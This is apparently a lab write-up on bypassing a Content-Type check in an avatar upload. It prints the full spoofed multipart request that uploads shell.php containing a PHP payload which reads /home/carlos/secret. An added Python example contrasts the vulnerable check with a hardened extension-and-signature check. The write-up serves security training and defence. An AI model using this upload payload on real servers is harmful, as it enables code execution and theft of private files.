Web shell upload via Content-Type restriction bypass
This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
I started by examining the upload functionality. With the proxy capturing all requests and the Images checkbox enabled in the HTTP history filter settings, I found a GET request fetching the uploaded avatar, which exposed the storage path as /files/avatars/<UPLOADED-FILE>. Attempting to upload my PHP file from a previous lab failed: the server rejected it with "Sorry, file type application/octet-stream is not allowed. Only image/jpeg and image/png are allowed. Sorry, there was an error uploading your file." The rejected type, application/octet-stream, is exactly the Content-Type my client had declared for the file part, which suggested the server was validating the user-supplied Content-Type header of the multipart part rather than the file's actual contents.
So I resent the upload request with the Content-Type header of the avatar part changed to image/jpeg, leaving the filename as shell.php:
POST /my-account/avatar HTTP/2
Host: ****.web-security-academy.net
Content-Length: 459
...
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

------WebKitFormBoundaryb6SRW1bH6V86hKfR
Content-Disposition: form-data; name="avatar"; filename="shell.php"
Content-Type: image/jpeg

<?php echo file_get_contents('/home/carlos/secret'); ?>
------WebKitFormBoundaryb6SRW1bH6V86hKfR
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryb6SRW1bH6V86hKfR
Content-Disposition: form-data; name="csrf"

utavcVKwL1TS6YHew5KZ7FE07cQgavji
------WebKitFormBoundaryb6SRW1bH6V86hKfR--
The payload included a simple PHP script as the avatar content:
<?php echo file_get_contents('/home/carlos/secret'); ?>
The upload was accepted. Navigating to https://YOUR-URL/files/avatars/shell.php then caused the server to execute the PHP and return the contents of /home/carlos/secret, which I submitted to solve the lab. Note that only the declared MIME type was checked: the .php extension was kept untouched, and that extension, not the header, is what determined the file was executed rather than served as an image.
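To make the bypass mechanism concrete, the following is an added example (not code from the original write-up or from the lab) that builds the spoofed multipart body shown above, then runs the 'avatar' part through two server-side checks: one that trusts the declared Content-Type, as the lab does, and a hardened one that ignores the header and requires an allow-listed extension plus matching magic bytes. The boundary string, the CSRF token value, the minimal multipart parser and the hardening policy are all constructed here for illustration; only the image/jpeg trick and the /home/carlos/secret payload come from the write-up.

```python
"""Content-Type restriction bypass: spoofed multipart upload vs. two server checks.

Added example, not the lab's or the write-up's own code. Boundary, CSRF token,
parser and the hardened policy are assumptions made for illustration.
"""
import re

BOUNDARY = "----WebKitFormBoundaryEXAMPLE0001"   # constructed, not the lab's boundary
PAYLOAD = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"


def build_upload_body(filename: str, content_type: str, data: bytes,
                      user: str = "wiener", csrf: str = "constructed-token") -> bytes:
    """Build the multipart/form-data body the avatar endpoint receives.

    The Content-Type on the avatar part is whatever the client writes, so
    declaring image/jpeg for a .php file is entirely under attacker control.
    """
    def part(headers: str, body: bytes) -> bytes:
        return f"--{BOUNDARY}\r\n{headers}\r\n\r\n".encode() + body + b"\r\n"

    body = part(
        f'Content-Disposition: form-data; name="avatar"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}",
        data,
    )
    body += part('Content-Disposition: form-data; name="user"', user.encode())
    body += part('Content-Disposition: form-data; name="csrf"', csrf.encode())
    body += f"--{BOUNDARY}--\r\n".encode()
    return body


def parse_avatar_part(body: bytes) -> dict:
    """Minimal (not RFC 7578 compliant) parser for the bodies built above.

    Returns the filename, declared Content-Type and raw bytes of the avatar part.
    """
    for segment in body.split(f"--{BOUNDARY}".encode()):
        if b'name="avatar"' not in segment:
            continue
        head, _, data = segment.partition(b"\r\n\r\n")
        filename = re.search(rb'filename="([^"]*)"', head).group(1).decode()
        ctype = re.search(rb"Content-Type: ([^\r\n]+)", head).group(1).decode()
        # Each part's data is followed by CRLF before the next boundary.
        return {"filename": filename, "content_type": ctype,
                "data": data.removesuffix(b"\r\n")}
    raise ValueError("no avatar part in body")


ALLOWED_TYPES = {"image/jpeg", "image/png"}


def vulnerable_accepts(part: dict) -> bool:
    """The lab's check as the write-up describes it: trust the declared type."""
    return part["content_type"] in ALLOWED_TYPES


# Assumed hardening policy: extension allow-list plus matching file signature.
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}


def hardened_accepts(part: dict) -> bool:
    """Ignore the declared Content-Type entirely.

    Accept only if the extension is allow-listed AND the bytes start with that
    format's magic number. A real server would also rename the file and store it
    outside any directory the interpreter handles, but that is beyond this check.
    """
    name = part["filename"]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    signature = MAGIC.get(ext)
    return signature is not None and part["data"].startswith(signature)


if __name__ == "__main__":
    spoofed = parse_avatar_part(build_upload_body("shell.php", "image/jpeg", PAYLOAD))
    print("vulnerable check accepts shell.php as image/jpeg:", vulnerable_accepts(spoofed))
    print("hardened check accepts the same upload:", hardened_accepts(spoofed))
```

Running the block shows the declared-type check waving the shell through while the magic-byte check rejects it; the check also rejects a file named shell.png containing PHP, and a file named shell.php with a real PNG header prepended, because both the extension and the signature must agree.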